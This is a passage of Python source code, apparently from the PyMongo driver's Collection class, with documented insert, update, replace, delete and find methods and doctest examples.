>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count()
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count()
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
